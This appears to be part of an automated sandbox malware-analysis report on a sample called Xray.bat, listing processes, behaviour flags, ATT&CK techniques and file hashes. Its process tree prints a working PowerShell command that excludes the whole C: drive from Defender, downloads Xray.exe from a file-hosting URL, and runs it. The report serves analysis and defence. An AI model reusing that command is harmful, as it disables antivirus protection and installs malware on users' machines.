    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.7.1489991522\1685595901" -childID 6 -isForBrowser -prefsHandle 3352 -prefMapHandle 3000 -prefsLen 26752 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0229a19-2a07-4ac4-b9ec-1ecf3617d340} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 3088 1c0fac77258 tab
    3⤵
    PID:1064

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5188

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Xray.bat" "
1⤵
PID:5836
- C:\Windows\system32\fsutil.exe
  fsutil dirty query C:
  2⤵
  PID:5948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c Add-MpPreference -ExclusionPath "C:";Start-BitsTransfer -Source "https://pixeldrain.com/api/file/aBxifE6W?download" -Destination "C:\Xray.exe";Invoke-expression "C:\Xray.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5964
- - C:\Xray.exe
    "C:\Xray.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5392
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5600

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6044

C:\Xray.exe
"C:\Xray.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5984
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Xray.exe.log

Filesize
1KB

MD5
8094b248fe3231e48995c2be32aeb08c

SHA1
2fe06e000ebec919bf982d033c5d1219c1f916b6

SHA256
136c30d964f4abbb5279bdc86d0e00578333782f15f05f0d2d050730dcb7a9bc

SHA512
bf27a3822008796370e2c506c910a40992b9240606ea1bc19f683b2fee86b81897660ac0cf8e746ca093dae9e408949e2e9002ded75678a69f020d3b0452801f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\activity-stream.discovery_stream.json.tmp

Filesize
22KB

MD5
2cf173bd39b7e28ce9ce50d761e02e56

SHA1
066d668b102d28923c602fbba82ab92f433c0d18

SHA256
1b9f76e879d92ce899aa82dd0cd575bb2f8e81fa0527d017582e9291cfda2a68

SHA512
9650cde6760a39347f03e5bfc59a464072fd36b17f8628bac9eb2455dafbd7e4ad9687bac3997191c62af918de0e994f42a939241bd293dda7e1a063e8feb861

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ldf51fz1.j0a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

Filesize
7KB

MD5
656564ba66da2f60a3190fefe35dee3a

SHA1
0ef7648d239a13cff911712063e779706a838018

SHA256
2f62d08018528356a857424b1b50e238e7f7994fe99b20c744fdbd685823fc60

SHA512
e1acabcd37c2698139dc7024ed760ba3d96320f542f4c80336ac42896b18d9ce21076133984a307cab28e86a0f5bbaa50210f4562e5be084c7426564fc9ceeab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

Filesize
6KB

MD5
c3d71efb88375e6992d413a5c482d6eb

SHA1
b610a3675c04027cad9cb4435ee1d0f7e2cfccc9

SHA256
fe1a92707753517970ba621e451fcda4d3f532f8d20a4f01a1596e2faac3108b

SHA512
5f191b4b303624e058429f165dfbc374d800ce3d24999e2bd15701c29df611ae408e08464af16c7346fe1a257b22d2d3eb81891b82b21b0ff2ff07663102a94d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
0da623e9532bb3000eec7a9b88aeee55

SHA1
3b5f2665099f704c3f75840c988b3ffc98ebf1ff

SHA256
c401709c4fb1532f54fc6f40a17bba5b85ed8c6114abb5257b34a2ed1f785b96

SHA512
f8aba535d25cb92f3f1681be62976cb376ccdd171778b3174944edb7f0873a8daeb81107a5599cb5d99018b415c4f498d6b56c495d63aa473a14051cd6a5b5a5

Download Submit
C:\Users\Admin\Downloads\Xray.bat

Filesize
546B

MD5
257de7ee5243ea6649ef98a2a94e1186

SHA1
10d1a94da7ecb36a9ccd02d8a51c3bec6ce1b6cf

SHA256
d17485d0de6c5126fd0aa3f0c2b4247222b28cfba34c8cba9d84d7f2a41794ec

SHA512
1c8a8921b9f0dbea3e2f5acaf4dd986cedda77ca52197986af76c9128c379b0fedbb70e319ecbe3c432af45e0c194f33684d2ce3978459aa9d08b0d3d4aa052c

Download Submit
memory/5392-122-0x0000025715E10000-0x0000025715E50000-memory.dmp

Filesize
256KB

Download
memory/5392-127-0x00007FFF76EC0000-0x00007FFF77981000-memory.dmp

Filesize
10.8MB

Download
memory/5392-125-0x0000025717AD0000-0x0000025717AE0000-memory.dmp

Filesize
64KB

Download
memory/5392-124-0x00007FFF76EC0000-0x00007FFF77981000-memory.dmp

Filesize
10.8MB

Download
memory/5964-89-0x0000027C68E60000-0x0000027C68E82000-memory.dmp

Filesize
136KB

Download
memory/5964-103-0x0000027C693A0000-0x0000027C693B4000-memory.dmp

Filesize
80KB

Download
memory/5964-123-0x00007FFF76EC0000-0x00007FFF77981000-memory.dmp

Filesize
10.8MB

Download
memory/5964-102-0x0000027C69200000-0x0000027C69226000-memory.dmp

Filesize
152KB

Download
memory/5964-97-0x0000027C68EB0000-0x0000027C68EC0000-memory.dmp

Filesize
64KB

Download
memory/5964-96-0x0000027C68EB0000-0x0000027C68EC0000-memory.dmp

Filesize
64KB

Download
memory/5964-95-0x0000027C68EB0000-0x0000027C68EC0000-memory.dmp

Filesize
64KB

Download
memory/5964-94-0x00007FFF76EC0000-0x00007FFF77981000-memory.dmp

Filesize
10.8MB

Download
memory/5984-139-0x00007FFF76880000-0x00007FFF77341000-memory.dmp

Filesize
10.8MB

Download
memory/5984-140-0x00000188E4680000-0x00000188E4690000-memory.dmp

Filesize
64KB

Download
memory/5984-144-0x00007FFF76880000-0x00007FFF77341000-memory.dmp

Filesize
10.8MB

Download